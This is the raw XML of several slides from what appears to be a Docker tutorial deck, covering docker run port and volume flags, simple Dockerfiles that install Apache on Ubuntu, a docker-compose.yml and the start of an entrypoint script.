            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp:cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> account/imageName:tagName</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -d -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp:cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hv:cv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2075">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> account/imageName:tagName</a:t>
            </a:r>
            <a:endParaRPr sz="2075">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1775">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -d -p hp:cp -v .:/var/www/html vishalmahawar5200/image1:tag1</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4426" name="Google Shape;4426;p717"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273650" y="3669350"/>
            <a:ext cx="8520600" cy="12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FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hp = Host Port</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cp = Container Port</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hv = Host Volume</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cv = Container Volume</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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0" name="Shape 4430"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4431" name="Google Shape;4431;p718"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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How to create ubuntu container always up and running from Dockerfile?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4432" name="Google Shape;4432;p718"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1505575"/>
            <a:ext cx="7840800" cy="2938800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM ubuntu:latest </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN apt-get update &amp;&amp; apt-get install -y vim apache2</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WORKDIR /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var/www/html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXPOSE 80 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMD ["apachectl", "-D", "FOREGROUND"]</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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6" name="Shape 4436"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4437" name="Google Shape;4437;p719"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="53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docker-compose.yml</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4438" name="Google Shape;4438;p719"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="837650"/>
            <a:ext cx="7840800" cy="40572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version: '3.8'</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services:</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anilservice:</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dockerfile: Dockerfile</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build: .</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ports:</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 "8080:80"</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volumes:</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 .:/var/www/html</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restart: always</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rgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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2" name="Shape 4442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4443" name="Google Shape;4443;p720"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61000" y="911925"/>
            <a:ext cx="8520600" cy="261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D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker-compose.yml </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internally</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> run </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker run -d -p -v </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4447"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4448" name="Google Shape;4448;p721"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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How to create ubuntu container always up and running from Dockerfile?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4449" name="Google Shape;4449;p721"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1505575"/>
            <a:ext cx="7840800" cy="2938800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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n" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM ubuntu:latest </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN apt-get update &amp;&amp; apt-get install -y apache2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXPOSE 80 </a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENTRYPOINT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>["./entrypoint.sh"]</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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3" name="Shape 4453"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4454" name="Google Shape;4454;p722"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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How to create ubuntu container always up and running from Dockerfile?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4455" name="Google Shape;4455;p722"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1505575"/>
            <a:ext cx="7840800" cy="341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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM ubuntu:latest</a:t>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN apt-get update &amp;&amp; apt-get install -y apache2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WORKDIR /var/www/html</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COPY entrypoint.sh .</a:t>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RUN chmod 777 entrypoint.sh</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXPOSE 80</a:t>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#CMD ["apachectl", "-D", "FOREGROUND"]</a:t>
            </a:r>
            <a:endParaRPr>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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENTRYPOINT ["./entrypoint.sh"]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4459"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4460" name="Google Shape;4460;p723"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="8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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entrypoint.sh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4461" name="Google Shape;4461;p723"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1505575"/>
            <a:ext cx="7840800" cy="3414000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
